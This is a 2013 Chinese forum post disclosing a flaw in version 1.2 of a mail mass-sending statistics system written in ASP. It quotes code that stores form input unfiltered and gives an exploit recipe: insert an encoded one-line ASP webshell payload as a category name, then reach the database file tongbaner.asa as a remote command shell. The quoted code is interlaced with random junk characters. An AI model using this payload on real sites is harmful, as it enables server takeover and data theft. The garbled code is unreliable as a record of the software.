找回密码
 立即注册
查看: 2545|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp + V7 G- A6 F' f0 s) {# x& P

3 ?* \# b" ^8 gIF Request.QueryString("Action")="del" Then
. q5 j$ `4 p( \; f$ R5 b6 n5 MID=Request.QueryString("ID") 1 b! @& E& R& v. H9 x" }1 J! u9 m1 n
IF Countss ("tui","Fenlei",ID )<>0 then
5 Z7 H( J( s' S9 N& `# o'略 0 j5 N+ B2 U. i- R, f
IF Request.QueryString("Action")="Add" Then + S9 O. I* l* N$ Y) C! h7 j# e
Tname=Request.Form("Typename") : i+ k$ T  r+ O9 w8 l
Set Rs=Server.CreateObject("adodb.Recordset")
. @0 A  A% _  u) t7 jSql="Select * From Fenlei Order by id Desc "
+ `. A& T. y$ \6 Q$ I* `# {0 z, l+ H) uRs.Open Sql,Conn,1,3 & I5 _6 K) ?, Q5 d- w! i+ m
Rs.Addnew
# r2 O% l0 v4 E! ~/ ^& w: PRs("Typename")=Tname
& w3 d" Y# q8 U/ a  U( K$ ~'略
6 Q$ M/ x* e7 Y2 Q3 q% I) R6 bSet Rs=Server.CreateObject("adodb.Recordset") # n* S( R2 ^* _) N! J
Sql="Select * From Fenlei Order by id Desc "
; t# A; q+ z' {4 e+ J6 IRs.Open Sql,Conn,1,1
1 r; Q0 `$ @1 j" |6 ~$ J# r- I'略   G5 q5 s; _4 F- {# Y6 S0 J, E. X* `
%>
! x6 @/ }8 |# r) U- x   R$ D  ~- F8 G$ `8 h! Y
9 W3 S* R' }" D* p) D
* `" r+ K; U& t5 v# ~4 k
没有过滤,直接写入数据库。7 c1 P6 q3 z# r# x
1 G! K% i" t; M( c/ |% q+ r+ U( Y
利用方法:
/ \* K# J0 c! N) Y7 \  H  a 5 W9 z1 \5 ^. F- {. O
插入:┼攠數畣整爠煥敵瑳∨≡┩>
0 Q) A3 B2 k# J1 s& a; Y " P8 C4 C6 |, J) C( p; y
5 s+ `  \: j& D% z+ ?
连接: http://www.xxx.com/###tongbaner.asa
& l" A4 C1 f# X  G! B# w# G'默认安装文件:
/ A+ _( Y8 @; z; W( V'install.asp: f: {, C- h7 S; f! I# ^! M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表